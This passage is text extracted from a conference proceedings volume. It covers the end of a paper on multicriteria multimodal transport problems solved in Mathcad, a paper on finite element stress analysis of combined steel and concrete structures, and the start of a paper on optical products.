However, it is easy to demonstrate that: ⎛ ⎞ ⎛ ⎞ 0.01 0.06 0.02 100 0 380 St × X = ⎝ 0.05 0.03 0.05 ⎠ × ⎝ 0 420 0 ⎠ 0.05 0.04 0.08 220 80 0 ⎛ ⎞ ⎛ ⎞ 0.01 0.06 0.02 320 0 160 = ⎝ 0.05 0.03 0.05 ⎠ × ⎝ 0 200 220 ⎠ = 35.4, 0.05 0.04 0.08 0 300 0 that is, both solutions (value of X) are correct. On this stage of solution, it is essential to differentiate the matrices of compromising reference plans X for each optimization criterion – cost and risk correspondingly: XS , XR . Inscribe these matrices on the base of the earlier calculations: ⎛ ⎛ ⎞ ⎞ 0 400 80 100 0 380 XS = ⎝ 320 100 0 ⎠, XR = ⎝ 0 420 0 ⎠. (15) 0 0 300 220 80 0 Now it is necessary to find the plan X¯ that is a compromising one in relation to the plans XS , XR , of (15). Calculate it in Mathcad according to formulas (13) and (14) (Fig. 14). It is considered that the volume of cargo transportation by the cost criterion is more important than the volume of transportation by the risk criterion. For example, the weight multipliers will be equal to: k1 = 0.7, k2 = 0.3. Also consider problem constraints for departure points supplies and delivery points needs. Check if X is a reference plan (Fig. 15): Solve the problem (11) for the found compromise plan X (Fig. 14). According to the input data of the problem (Figs. 2 and 10) and the results of calculations obtained in (Figs. 4, 9 and 12), we have the following input data to the problem (11) (Fig. 16):
96
S. Mogilei et al.
Fig. 14. Calculation of compromising plan X
Fig. 15. Checking if X is a reference plan
Fig. 16. Initial data of the problem (11)
Minerr function is applied to solve the problem (11) with the given input data (Figs. 14 and 16). The results are obtained (Fig. 17): It is shown in (Fig. 18) that the resulting matrices V0 , V1 , V2 (Fig. 17) and hence their corresponding matrices X 1 , X 2 , X 3 are transportation plans for each transport type of the problem.
Solving Multimodal Transport Problems Using Algebraic Approach
97
Fig. 17. Application of the Minerr function to solve the problem (11)
Fig. 18. Checking the results of problem solution
To improve the result of solving the problem, concessions to the objective functions S or R can be applied. For example, put concession dS = 2500 and use it for objective function S (Fig. 19):
98
S. Mogilei et al.
Fig. 19. Results of calculations using concession dS = 2500
Obviously, the results obtained in (Fig. 20) for objective functions S and R are better than the results from (Fig. 18), because their values are closer to the optimal ones – Smin , Rmin .
Fig. 20. Checking the results of problem solution using concession
Adjustment of coefficients k1 i k2 (13) is another way to influence the result of solving the transport problem by the proposed method. The considered examples demonstrate the algorithm for solving both one- and multicriteria multimodal transport problems. The algorithm is based on the methods for finding integrated and compromising reference plans for a multimodal transport problem, including the integrated reference plan method and, in case of a multicriteria problem, the modified method of weighting coefficients and successive concessions. Generally,
Solving Multimodal Transport Problems Using Algebraic Approach
99
a multicriteria multimodal transport problem can be solved through reducing it into the system of linear matrix equations and inequalities.
4 Discussion The study suggests a new approach for solving both single- and multi-criteria multimodal transport problems. The approach is based on applying two methods: 1) Integrated reference plan method that means search for an integrated reference plan of transport problem between reference plans for each mean of transport with a certain criterion of optimization; 2) Modified method of weighting coefficients (superposition of objective functions) which likewise suggests a compromising reference plan for the transport problem though unlike the integrated reference plan method is applicable to the multicriteria one-modal transport problem, while the compromise reference plan is determined not for means of transportation but for different optimization criteria. As a result of the previously mentioned new approaches application, a multicriteria multimodal transport problem can be reduced to the state of a classical one (one-modal one-criteria) transport problem (the algorithms of which are still known) and investigated, through the system of linear matrix equations and inequalities of measurement σ + 1, where σ is a number of objective functions of the problem. The paper presents a block scheme for the algorithm of solving the multicriteria multimodal transport problem. Successive iterations according to the scheme are presented as a numeric problem solution. Practical application value of the integrated reference plan method for a numeric problem solution of the kind can help in defining the first iteration close to the problem solution. Therefore, a number of iterations for the problem solution can be considerably reduced. The improved first iteration is sure to have an applied effect that is considerably dependent on the objective functions of the problem itself and on the measurements of the problem (the number of departure and delivery points) and on other parameters which affect the volume of processed data. The matter of measurements for the objective functions superposition led to investigation of new methods for multicriteria optimization, that are to be applied for solving transport problems. The peculiarity of the proposed method is that it uses a superposition not for objective functions, but for reference plans of the problem for each optimization criterion.
5 Conclusions The article regards solving multimodal transport problems with one and numerous optimization criteria to construct reference plans using the integrated reference plan method. The algorithm based on the method has been enriched and expanded through constructing systems of linear matrix equations and inequalities. It is shown that in the case of multicriteria transport problem it is appropriately to use such optimization methods as the method of weighting coefficients and the method of sequential concessions, previously
100
S. Mogilei et al.
adapted to the related problem model. These methods are well suited for searching compromise reference plans of the problems and help to solve the dimensionality problem of the objective functions superposition. The paper also demonstrates the ability to transform σ -criteria multimodal transport problem into classical transport problem through constructing the system of linear matrix equations and inequalities of σ + 1 measurement. Demonstration examples of the problem were solved using the Mathcad environment, but they could be solved with the help of other means of computer mathematics. Furthermore, if a multicriteria (but unimodal) transport problem is considered separately, a new method of its solution can be proposed. This method is based on the search for a compromise reference plan, that is not relative to transport means, as in the of integrated reference plan method, but relative to optimization criteria. In fact, this method combines characteristics of weighting coefficients and successive concessions methods. The application of previously mentioned methods for solving multicriteria and multimodal transport problems will enable to reduce iterations number in numeric solution of these problems and to overcome the problem of measurement of superposition of their objective functions. It means that every method which uses the superposition of objective functions of the optimization problem can be used for realization of its solution. The methods that have been extended and adapted to the described models of transport problems are potentially able to increase the efficiency of search for the optimal solution of problems. This improvement is achieved through the definition of a more exact first numeric iteration of the problem, that reduces the number of iterations and makes easier the calculations using software tools. This especially matters in the case of a large measurement of the transport problem, the quantity of the operated parameters, calculating Pareto’s set for its solution and/or objective functions. The study revealed that a complex multicriteria multimodal transport problem can be solved through its decomposition into several simpler classical (standard – one-criterial one-modal) transport problems and, in fact, into one algebraic problem of solving a system of linear matrix equations and inequalities. Further research should be focused on analyzing the efficiency of various approaches to solving multicriteria multimodal transport problems and on comparing their efficiency and similarity. Besides, it would be interesting to analyze the ability of the decision making person to influence the solution of multicriteria multimodal transport problems choosing the values of weighted coefficients and concessions.
References 1. Archetti, C., Peirano, L., Speranza, M.G.: Optimization in multimodal freight transportation problems: a survey. Eur. J. Oper. Res. 299(1), 1–20 (2022). https://doi.org/10.1016/j.ejor. 2021.07.031 2. Das, A.K., Deepmala, Jana, R.: Some aspects on solving transportation problem. Yugoslav J. Oper. Res. 30(1), 45–57 (2020). https://doi.org/10.2298/YJOR190615024D 3. Gupta, K., Arora, R.: Three dimensional bounded transportation problem. Yugoslav J. Oper. Res. 31(1), 121–137 (2021). https://doi.org/10.2298/YJOR191215013G 4. Rossolov, A., Kopytkov, D., Kush, Y., Zadorozhna, V.: Research of effectiveness of unimodal and multimodal transportation involving land kinds of transport. East.-Eur. J. Enterp. Technol. 5(3(89)), 60–69 (2017). https://doi.org/10.15587/1729-4061.2017.112356
Solving Multimodal Transport Problems Using Algebraic Approach
101
5. Laurent, A.-B., Vallerand, S., van der Meer, Y., D’Amours, S.: CarbonRoadMap: a multicriteria decision tool for multimodal transportation. Int. J. Sustain. Transp. 14(3), 205–214 (2020). https://doi.org/10.1080/15568318.2018.1540734 6. Chen, D., Zhang, Y., Gao, L., Thompson, R.G.: Optimizing multimodal transportation routes considering container use. Sustainability 11(19), 5320 (2021). https://doi.org/10.3390/su1119 5320 7. Tokcaer, S., Özpeynirci, Ö.: A bi-objective multimodal transportation planning problem with an application to a petrochemical ethylene manufacturer. Marit. Econ. Logist. 20, 72–88 (2018). https://doi.org/10.1057/s41278-016-0001-4 8. Kaewfak, K., Ammarapala, V., Huynh, V.N.: Multi-objective optimization of freight route choices in multimodal transportation. Int. J. Comput. Intell. Syst. 14(1), 794–807 (2021). https://doi.org/10.2991/ijcis.d.210126.001 9. Owais, M., Alshehri, A.: Pareto optimal path generation algorithm in stochastic transportation networks. IEEE Access 8, 58970–58981 (2020). https://doi.org/10.1109/ACCESS.2020.298 3047 10. Su, J., et al.: Constructing reference plans of two-criteria multimodal transport problem. Transp. Telecommun. 22(2), 129–140 (2021). https://doi.org/10.2478/ttj-2021-0010 11. Bychkov, I., Zorkaltsev, V., Kazazeva, A.: Weight coefficients in the weighted least squares method. Numer. Anal. Appl. 8(3), 223–234 (2015). https://doi.org/10.1134/S19954239150 30039 12. Plaia, A., Buscemi, S., Sciandra, M.: Consensus among preference rankings: a new weighted correlation coefficient for linear and weak orderings. Adv. Data Anal. Classif. 15(4), 1015– 1037 (2021). https://doi.org/10.1007/s11634-021-00442-x 13. Dovha, N., Tsehelyk, H.: Using the method of successive concessions for solving the problem of increasing cost price. Young Sci. 10(86) (2020). https://doi.org/10.32839/2304-5809/202010-86-6 14. Bakurova, A., Ropalo, H., Tereschenko, E.: Analysis of the effectiveness of the successive concessions method to solve the problem of diversification. In: CEUR Workshop Proceedings, vol. 2917, pp. 231–242 (2021) 15. Honcharov, A.V., Mogilei, S.O.: Methods of realization of multicriteria business-models of multimodal transport companies. Math. Comput. Model. Tech. Sci. 22, 50–58 (2021). https://doi.org/10.32626/2308-5916.2021-22.50-58. Ivan Ohienko National University of Kamyanets-Podilskiy 16. Gubina, S.: The solution of optimization problems by means of Mathcad and MS Excel. Actual Dir. Sci. Res. XXI Century: Theory Pract. 2(5), 268–270 (2016). https://doi.org/10. 12737/6402 17. Honcharov, A.V., Mogilei, S.O.: Realization of multimodal transport problems by different program means. Bull. Cherkasy State Technol. Univ. 3, 67–74 (2020). https://doi.org/10. 24025/2306-4412.3.2020.215516
Numerical Analysis of the Stress-Strain State of Combined Steel and Concrete Structures Grygorii Gasii1(B) , Olena Hasii2 , Ivan Skrynnik3 , and Oleksandr Lizunkov3 1 National Aviation University, Kyiv, Ukraine
[email protected] 2 Poltava University of Economics and Trade, Poltava, Ukraine 3 Central Ukrainian National Technical University, Kropyvnytskyi, Ukraine
Abstract. The article presents the results of numerical experiments aimed at studying the stress-strain state of combined steel and concrete structures and separate elements under loading by computer simulation of behavior. Following the goal, the simulation is carried out using the stress-strain diagrams of applied materials, experimentally received. The study of the structures is carried out using the finite element method on both two-dimensional and three-dimensional models. To obtain reliable numerical data, additional research is carried out, the essence of which is to find parameters and boundary conditions to achieve the convergence of the results for each computer model, as well as to carry out numerical studies similar to experimental ones. Taking into account the received data, several numerical studies are conducted, which allows to find additional information about the stress-strain state of the structures, in particular, the behavior of the developed nodal connections is modeled. A comparison of the obtained numerical and experimental data shows their high convergence. Keywords: Stress-strain state · combined steel and concrete structures · computer models · simulation
1 Introduction Today, the rapid development of technology and computers, including laptops and desktop personal computers, generates a significant amount of research related to mathematical modeling, numerical analysis, and simulation of building structures or separate elements under various loads and influences. Of all the numerical methods used for this, the finite element method is the most widespread [1–7, 9, 11, 13, 15, 17, 19]. The use of modern multifunctional calculation software based on the finite element method creates opportunities for short-term design, prediction of behavior, and strength analysis of building structures, buildings and structures, and more. This opens up opportunities to obtain data on the structure’s behavior, which are sometimes difficult or sometimes impossible to obtain experimentally or analytically. Therefore, the aim and objectives of the study are to solve the problems associated with the numerical study of structures and adaptation and verification some key points, © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 102–112, 2023. https://doi.org/10.1007/978-3-031-35467-0_7
Numerical Analysis of the Stress-Strain State of Combined Steel
103
in particular, the choice of the type, shape, and size of finite elements; setting boundary conditions; acceptance of the material model and specification of their physical and mechanical characteristics; taking into account various types of nonlinearities, etc.
2 Materials and Methods Numerical studies have been conducted to obtain additional information about the behavior and stress-strain state of the combined steel and concrete structures, and some of the results should be considered in conjunction with the results of experimental and analytical studies [8]. As world experience shows, the solution to applied problems of varying complexity can be achieved both by setting up an experiment and mathematical modeling [16, 20]. Using each of these methods, you can solve a problem. With the help of an experiment, you can get solutions to both simple and very complex problems, but the reliability of the results will be limited by the conditions under which the experiment has been conducted or those that are provided and taken into account by experimental research methods. In this case, numerical experiments make it possible to significantly expand these conditions and obtain a more detailed picture of the behavior and stress-strain state of the structures. Because of this, it is expedient to conduct numerical research with elements of optimization and analysis of the stress-strain state of the combined steel and concrete structures and to single components or elements. Numerical studies of the structures were performed using computational complexes [14] that implement the finite element method and have a wide range of functionalities, including means of visualization of the obtained solutions in the form of isoline, plots, etc. The numerical studies conducted in the general case included several stages, which were performed in a certain sequence. First of all, the object of research was determined, i.e. the physical formulation of the problem was performed. The next step –a finite element model was created – a mathematical formulation of the problem. Then modeling (solution search), analysis of the obtained results, and their comparison with the experiment were performed alternately. Due to the prevalence of the finite element method, this study does not focus on its theoretical principles, provisions, and assumptions, as it is well known, and because the purpose of the study is not to improve the method. The finite element method, implemented in the software, is used only as a tool for solving the tasks – the analysis of the stress-strain state of combined steel and concrete structures and components. Thus, the main focus is on certain issues that are directly related to the study of the structures or are subject to uncertainty and affect the accuracy of the results. Such issues include choosing the type, shape, and size of finite elements, because the choice of these parameters, as well as the imposition of ties or setting boundary conditions, is left to the user of the software. In addition, important issues are the adoption of the material model, setting their physical and mechanical characteristics, taking into account various kinds of nonlinearities, etc. Therefore, as mentioned earlier in the introduction, the purpose of the research is primarily to apply the finite element method to analyze the stress-strain state of combined
104
G. Gasii et al.
steel and concrete structures and establish the nature of failure by creating and calculating mathematical models of combined steel and concrete structures taking into account key points such as the shape and size of finite elements, boundary conditions, material model, physical and constructive nonlinearities [10, 15], and with subsequent verification of the results through comparison with the results of physical experiments. For an adequate description of the structure model and its behavior under load, boundary conditions were adopted that correspond as closely as possible to real conditions. In particular, the supporting of the structure was adopted, which corresponds to the real conditions of the structure behavior, it is a freely supported structure that is in the two-way slab. In current studies, the key point of the analytical statement of the research problem is presented and explained, but for integral cases, the analytical statement of the research problem (taking into account the peculiarities of the research, in particular, boundary, geometric and initial conditions) are considered in previous author’s studies [4, 17] and [5, 14].
3 Experiments In most cases, the application of classical concepts and the theory of elasticity is sufficient to solve the problem, but sometimes, for example, predicting behavior in the stages of work preceding the destruction and determining the bearing capacity of elements is likely to be insufficient. Due to the peculiarities of the structure, to establish their actual behavior, taking into account various kinds of nonlinearities, was preferable. The physical nonlinearity of the structure is because the strain of the materials from which it is made, in particular concrete, is subject to nonlinear law, i.e. there is no linear relationship between stresses and strains. Modeling of physical nonlinearity of the materials of the created structures was carried out with the help of finite elements, for which the nonlinear dependence is realized by introducing material deformation diagrams (Prandtl diagrams). It is noteworthy that the software used in this way allows to take into account almost any nonlinear properties of materials. The possibility of taking into account physical nonlinearity in this way is stated in the publication [10, 15]. Regarding the structural nonlinearity of the created structures, it is determined by the property of its elements (lower belt elements, joints of upper belt elements, etc.) to be included in the work depending on various factors of the stress-strain state, in particular, lower belt elements (flexible rods, cables, tapes, etc.) can work only in tension and, in the case of the use of a rolling profile of round or other cross-section as a cable, on low compression forces. In this case, the constructive nonlinearity can be reduced to a nonlinear relationship between forces and displacements. Thus, depending on the research task and the functionality of the software used, different models were used. An elastic model was used for numerical experiments of structures that require modeling of the contact surfaces of different materials or elements at the junction of their joints; calculation of structures or individual structural elements made of homogeneous material, in particular steel, was performed in elastic or elastic
Numerical Analysis of the Stress-Strain State of Combined Steel
105
nonlinear setting with the introduction of diagrams (Fig. 1); the calculation of composite sections, in particular reinforced concrete slabs, was performed in elastically nonlinear setting using diagrams (Prandtl diagrams) (Fig. 1) of the simulated materials.
Fig. 1. The stress-strain diagrams for concrete (left diagram) and stell (right diagram)
Further, following [14], the key points of the mathematical model, which has been used to analyze the stress-strain state of combined steel and concrete structures, are described, but for clarity, a detailed description of the mathematical model with explanations is given in [14]. When solving boundary value problems of the mechanics of a deformed solid concerning – the definition of displacements at →thestress-strainstate → → x , t , strains εij − x , t and stresses σmn − x , t systems each point of the body Ui − of static equilibrium equations, geometric relations, and equations of physical models of material areused [14]. It is believed that in the initial moment t0 in the body the → → → x , t , εij − x , t and σmn − x , t are known or equal to zero. Then magnitudes Ui − in the body Φ, as well as on its surface Θ for some time Δt there is a change of load
with step n, i.e. at the moment t n+1 are applied volume Qm (x; t), surface P m (x; t) and concentrated R m (x; t) forces. The static equilibrium equation has the following form and description [14]: n
∇n σ mn + Q = 0,
(1)
n
where Q – set load. Regarding the geometric ratios, it is considered that the deformations are compatible, and their level of 2% is used [14]: εij = εijE + εijT + εijC + εijP .
(2)
That is, the total strains εij are the algebraic sum of elastic εijE , temperature εijT , creep εijC and plasticity εijP ones [14]. It should be noted that elastic deformations are always present, and others – only when the corresponding boundary value problem is considered, i.e. in this case εij = εijE .
106
G. Gasii et al.
There is an unambiguous relationship between stresses and elastic deformations (Hooke’s law), i.e. the equation of physical models of material in the elementary volume of the body to determine its linear-elastic deformations has the form: σ mn = E mnij · εijE .
(3)
The isotropic elastic material is given by independent elastic characteristics – Young’s modulus E and Poisson’s ratio ν, and the associated dependence (2) shear modulus: G = E/2 · (1 + ν).
(4)
Equations for determining elastically nonlinear deformations are expressed in the form of laws. Elastic change of volume: εVS = σV /3k,
(5)
eijS = φ · Sij ; φ = 3εuS /2σu .
(6)
where εVP = εVC = 0. Shape changes:
Equation of state, which is determined experimentally and given in the form of functional dependence: σu = K(εuS ),
(7)
→ where k = k(− x ; T ) – modulus of volumetric compression; εV = δij · εij /3 and σV = δij σij /3 – bulk strains and stresses, respectively; eij = εij − δij εV and Sij = σij − δij σV – the components of the deviator parts of strain and stress tensors, respectively; εuS and σu – the intensities of strains εijS = εij − εijT and stresses σij respectively. Since the model of the material is elastic, all strains are inverse, and the functional dependence (3) can be given in the first quadrant as a tensile curve, and in the third – as a compression curve. The equations of static equilibrium, geometric relations, and equations of the physical model of the material are supplemented by boundary conditions m
of the second kind σ mn Vn |Sr = P , as well as concentrated forces R m , applied to the nodes of the finite element model. In the general case, an elastic model of the material was used to conduct numerical experiments. The modulus of elasticity and Poisson’s ratio were given for this purpose. In the general case, unless otherwise indicated, E = 2.0 . . . 2.1 × 105 MPa and ν = 0.3 for steel and E = 3.20 . . . 3, 31 × 104 MPa and ν = 0.2 for concrete. For other studies (unless otherwise noted), an elastically nonlinear model of the material was used that took into account its physical nonlinearity. To model the elastically nonlinear material, a functional dependence of the type “stress-strain” was additionally set. To describe different properties of the material during compression and tension, in
Numerical Analysis of the Stress-Strain State of Combined Steel
107
particular concrete, the dependence of σ − ε was given in the first and third quadrants. To describe the properties of steel, the dependence σ − ε was given in the first quadrant. The type of material in all cases was considered isotropic. It should be noted that the σ − ε type dependencies were created for all materials (concrete, steel pipes, fittings, sheet steel, etc.) based on the results of experimental tests of standard samples [16, 18] or reference data. The geometry of all models was built by importing ACIS files with the extension sat, which contained information about three-dimensional geometric models built using a third-party computer-aided design system.
4 Results When performing computer simulation of combined steel and concrete structures and single elements under external load, the results and experience of research of combined steel and concrete slab in [16] were used, so to study the stress-strain state of combined steel and concrete structures, a three-dimensional model of finite elements no larger than 5 × 5 × 5 mm was used. The structures of the same dimensions as for experimental research with similar physical and mechanical properties of materials are taken as an experimental model [16]. Figure 2 shows regions with the failure stress 30 MPa (this stress is taken as the failure one of the structure). Attention is not focused on other stress regions, as they do not carry important information for solving the set goal. In this model, the entire steel rod elements, which can be seen in Fig. 4, a, are conventionally not shown and are replaced by supports. That is, the composite plate part of the complex structure is investigated since the stress-strain state of the steel rod elements is clear. Of course, such failure stress was considered as a failure criterion of the structure only for the compressed concrete, which is reinforced with steel wire dispersedly, although the figure also shows 30 MPa regions in the places where tensile stress appeared, when in fact rod reinforcement is in tensile there, not concrete. However, under such stresses, cracks will be able to appear, which are also a criterion for the destruction of the structure. The load was point loads, which were applied in four spots in stages according to the experimentally obtained deformation diagram of the materials. The combined steel and concrete structures model included concrete, rod reinforcement (similar to reinforced concrete slab) in the stiffeners, and reinforcing mesh, each of which was modeled with a solid object 1 mm high. The results of computer simulations of combined steel and concrete structures under concentrated force are presented in Fig. 3. The results are reflected in the form of stress isolines [16, 17]. It can be seen from the figure that in the reinforced cement slab, the stresses are distributed symmetrically about the symmetry axes. The maximum stress is at the stiffness ribs in the location of applied force on the lower surface of the plate, as well as along the upper face of the stiffness axis in the location of the change in the area of the transverse cut (in the location of the transition of the plate to the hardness ribs). To identify the weakest spot and regions prone to failure, a detailed analysis of the stress distribution was made. From the above distribution of critical stresses in the body of combined steel and concrete structures, it can be seen that the tensest are the areas that are: located close to
108
G. Gasii et al.
Fig. 2. Regions of stresses in reinforced cement slab at failure stress areas (green color)
Fig. 3. Comparison of the nature of the failure of combined steel and concrete structures, obtained by the experimental way (a) and computer simulation (b), where 1, 2, 3, and 4 are the numbering of failure regions following Fig. 2
the application of concentrated force both at the top and bottom of the plate (region 1 in Fig. 3); in the interval between the place of application of the concentrated force and the support section (region 2 in Fig. 3); in places of support of a plate (region 3 in Fig. 3); located on the lower edge of the stiffeners (region 4 in Fig. 3). The identified regions with the highest stresses completely coincide with those obtained experimentally. The coincidence of the results of computer and physical experiments in determining the nature of the destruction of the supporting part of the plate is well traced. The joint work of the components of combined steel and concrete structures was taken into account when building the computer model of the connection node and imposing the boundary conditions on it. Modeling of physical and mechanical characteristics of materials was performed by specifying the modulus of elasticity and Poisson’s ratio, which were determined experimentally [16, 17]. Combined steel and concrete structures were modeled by specifying the above characteristics [16]. As an example, the stress-strain state of the links of combined steel and concrete structures, which consisted of volume modules with dimensions on the plan of 0.8 × 0.8 m and a height of 0.5 m, was analyzed. The finite element model was built taking into account the recommendations [12].
Numerical Analysis of the Stress-Strain State of Combined Steel
109
The contact surface was simulated between the steel members and the concrete. The contact surface was also defined for the bolted assembly to simulate the hinge in the joints. Because finding a solution for the whole structure takes a lot of time, and the model itself includes a large number of complex parts and contact surfaces, which can cause significant errors in the calculation, finite element analysis of the link was performed on a fragment of the structure. In the finite element analysis of the joint, the main emphasis was on the study of the stress-strain state under loading, so the load and physical and mechanical properties of the materials were set following this condition. To obtain objective data, the model was calculated following six types of boundary conditions, each of which provided for different boundary conditions. Following the first, second, and third schemes of the study, the model of the structure was hinged on both sides. Following the fourth, fifth, and sixth research schemes, the model had a hinged fastening on one side and a freely supported edge on the other. The fixation of the lower belt for all schemes of the study was such that it allowed horizontal movement in the longitudinal direction. The loading was assumed to be evenly distributed and, depending on the research scheme, was applied to different parts of the structure. Following the first and fourth research schemes, the load was applied to the entire surface (simultaneously to the steel and reinforced concrete part), according to the second and fifth – to the steel part, according to the third and sixth – only to the reinforced concrete slab (see Fig. 4, a). In general, the connection link ensures reliable and compatible work of the components of the structure, regardless of the method of application of external loads (Fig. 4), and was modeled in a manner described in [20]. When the loads are applied, the joint was not significantly deformed, which could lead to failure. This was confirmed by the results of experimental studies of combined steel and concrete structures under temporary load applied in the links.
Fig. 4. Experimental model of components joint the combined steel and concrete structures (a) and the stress-strained state modeling in MPa following the first type of boundary conditions (b)
110
G. Gasii et al.
5 Discussions The results in the form of stress isolines show that a computer experiment on a mathematical model, which is a numerical implementation of a real structure tested for a similar load under the same boundary conditions, allowed to obtain a true picture of stress distribution over its body. Thus, it is possible to assert the reliability of the obtained results and the possibility of applying the developed method of computer experiment to study the created structures under the action of other loads and influences. Note that the practical convergence of the deflections (displacements) of the structure for different densities of the finite element model is achieved quickly enough, so to determine the deflections of the plate within an error of 5% a grid of 40 × 40 mm is sufficient. However, the situation is different with the convergence of tensions. The problem of the difficulty of achieving practical convergence of stresses sometimes occurs in the finite element analysis of structures on the action of concentrated force. This can be evidenced by the example given in [11], which demonstrates a comparison of the results of the calculation of a hinged plate under the action of a uniformly distributed load and concentrated force. Comparisons have shown that the rate of coincidence of the simulation results under the action of a concentrated force is less than under the action of a uniformly distributed load. It should be noted that the low rate of coincidence of the calculation results applies only to extreme values, in general, throughout the surface the forces have better convergence, which allows within the allowable error to analyze the stress-strain state of the structure. For a more objective analysis of the studied structure in [11], it is recommended not to take into account the required values in places located close to the place of application of force. Thus, analyzing the results of numerical calculations and comparing them, itwas found that to analyze the stress-strain state of combined steel and concrete structures one should take a finite element model with a dimension not exceeding 200 mm. It should be noted that the three-dimensional models included both concrete and reinforcement, which was modeled by individual rods of square cross-section with an area equivalent to the area of reinforcing rods of circular cross-section used in reinforcing the actual structure. The results of the calculation of the model are reflected in the form of voltage isolines. The main criterion for the strength of experimental structures is its state when the maximum stresses reach values corresponding to the material strength, i.e. after calculating the models of experimental structures for loads similar to the experimental ones it was assumed that the structure collapses in places with ultimate stresses.
6 Conclusions The performed computer simulation allows to obtain additional information about the stress-strain state of the structures. The sizes of finite elements for modeling the work of created structures are determined by gradually increasing the density of finite element models of the studied structures and establishing the fact of convergence of results. It is established that to obtain objective numerical data on the stress-strain state of combined steel and concrete structures, it is necessary to create finite element models,
Numerical Analysis of the Stress-Strain State of Combined Steel
111
which may have different densities depending on the research task and structural element. To model the rod two-dimensional elements of the structures, it is enough to use finite elements that have the same dimensions as the element itself. When modeling structures using three-dimensional (three-dimensional solid) models, solid finite elements, as in the previous case, can have different sizes. Elastic and elastic nonlinear models of materials are used for numerical calculations. The elastic model is given by introducing the modulus of elasticity and Poisson’s ratio. The elastically nonlinear model additionally requires the introduction of Prandtl diagrams. The stress-strain state of combined steel and concrete structures is investigated. Modeling of their work on the impact of the load applied in different ways has shown the joint work of the components of the module. The obtained results indicate that the combined steel and concrete structures under load behave as integral elements. Consequently, in the study of the stress-strain state of combined steel and concrete structures under a uniform load (a similar experiment), data are obtained that coincide with experimental and theoretical data by 9%. As a result of the study of the stress-strain state of the structure under uniform load (similar to the experiment), data are obtained that agree with the experimental and theoretical ones. As a result of research on a design under loading, it is established that its bearing capacity and the scheme of deformation depend on the place of application of external loading and its size. As a result of the study, the algorithm for conducting a numerical experiment is obtained, which includes some successive actions: depending on the task, an elastic or elastic-plastic model of the material is taken; if the elastic model of the material is accepted, then for modeling it is enough to enter the elastic modulus and Poisson’s ratio, and if the elastic-plastic model of the material is accepted, then it is necessary to additionally set the Prandtl diagram; then the boundary conditions are set; following the obtained recommendations or being guided by [11, 14, 17], the size of the finite element should be accepted; the next step is building a calculation model by meshing the geometric model of the structure into a finite element mesh; the last step is calculations and data analysis.
References 1. Aznakayeva, D.E., Yakovenko, I.A., Aznakayev, E.G.: Numerical calculation of passive acoustic graphene nanosensor parameters. In: The 2016 IEEE Radar Methods and Systems Workshop (RMSW), pp. 95–98. IEEE (2016) 2. Bui, V.T., Truong, V.H., Trinh, M.C., Kim, S.E.: Fully nonlinear analysis of steel-concrete composite girder with web local buckling effects. Int. J. Mech. Sci. 184, 105729 (2020) 3. Francavilla, A.B., Latour, M., Rizzano, G.: Experimental and numerical analyses of steelconcrete composite floors. Open Civ. Eng. J. 14(1), 163–178 (2020) 4. Gasii, G.M.: Finite element analysis of the stress and strain state of the node of the top belt of the steel and concrete composite cable space frame. Collect. Sci. Works Ukrainian State Univ. Railway Transp. 171, 69–76 (2017) 5. Gorodetsky, O.S., Barabash, M.S., Filonenko, Y.B.: Numerical methods for determining stiffness properties of a bar cross-section. Cybern. Syst. Anal. 55(2), 329–335 (2019)
112
G. Gasii et al.
6. Hassan, M.K., Subramanian, K.B., Saha, S., Sheikh, M.N.: The behavior of prefabricated steel-concrete composite slabs with a novel interlocking system–numerical analysis. Eng. Struct. 245, 112905 (2021) 7. Ju, H., Lee, D., Choi, D.U.: Finite element analysis of steel-concrete composite connection with prefabricated permanent steel form. J. Asian Concr. Fed. 8(1), 1–15 (2022) 8. Lapenko, O., Baranetska, D., Makarov, V., Baranetskyi, A.: Designing of structural construction and orthotropic slabs from steel reinforced concrete. In: Materials Science Forum, vol. 1006, pp. 173–178. Trans Tech Publications Ltd. (2020) 9. Lemes, Í.J., Dias, L.E., Silveira, R.A., Silva, A.R., Carvalho, T.A.: Numerical analysis of steelconcrete composite beams with partial interaction: a plastic-hinge approach. Eng. Struct. 248, 113256 (2021) 10. Lima, P.H., Carvalho, T.A., Lemes, Í.J., Barros, R.C., Silveira, R.A.: Non-linear analysis of steel-concrete composite frames via RPHM considering cracking and partial shear connection. In: Proceedings of the XLI Ibero-Latin-American Congress on Computational Methods in Engineering, ABMEC, pp. 1–7 (2020) 11. Perelmuter, A.V.: Calculation Models of Structures and the Possibility of their Analysis. SCAD Soft (2011) 12. Perelmuter, A.V.: Structural Mechanics Conversations. SCAD Soft. ASV (2014) 13. Rossi, A., Nicoletti, R.S., de Souza, A.S.C., Martins, C.H.: Numerical assessment of lateral distortional buckling in steel-concrete composite beams. J. Constr. Steel Res. 172, 106192 (2020) 14. Rudakov, K.N.: FEMAP 10.2.0 Geometric and Finite Element Modeling of Structures. KPI (2011) 15. Sathyamoorthy, M.: Nonlinear Analysis of Structures. CRC Press, Boca Raton (2017) 16. Storozhenko, L.I., Gasii, G.M.: Experimental research of strain-stress state of ferrocement slabs of composite reinforced concrete structure elements. Metall. Min. Ind. 6(6), 40–42 (2014) 17. Storozhenko, L., Gasii, G.: Analysis of stress-strain state of the steel-concrete composite ribbed slab as a part of the spatial grid-cable suspended structure. Ind. Mach. Build. Civ. Eng. 2, 81–86 (2016) 18. Storozhenko, L., Gasii, G., Hohol, M., Hasii, O.: Preparation technique of experimental specimens of steel and concrete composite slabs. In: Onyshchenko, V., Mammadova, G., Sivitska, S., Gasimov, A. (eds.) ICBI 2020. LNCE, vol. 181, pp. 147–154. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-85043-2_14 19. Uddin, M.A., Sheikh, A.H., Brown, D., Bennett, T., Uy, B.: Geometrically nonlinear inelastic analysis of steel-concrete composite beams with partial interaction using a higher-order beam theory. Int. J. Non-Linear Mech. 100, 34–47 (2018) 20. Wang, Y.H., Yu, J., Liu, J., Chen, Y.F.: Experimental and numerical analysis of steel-block shear connectors in assembled monolithic steel-concrete composite beams. J. Bridge Eng. 24(5), 04019024 (2019)
Intellectual Control of Mechanical Characteristics of Optical Products Iryna Makarenko, Eugene Fedorov, Yuliia Bondarenko(B) , and Yevhenii Bondarenko Cherkasy State Technological University, Cherkasy, Ukraine [email protected], [email protected]
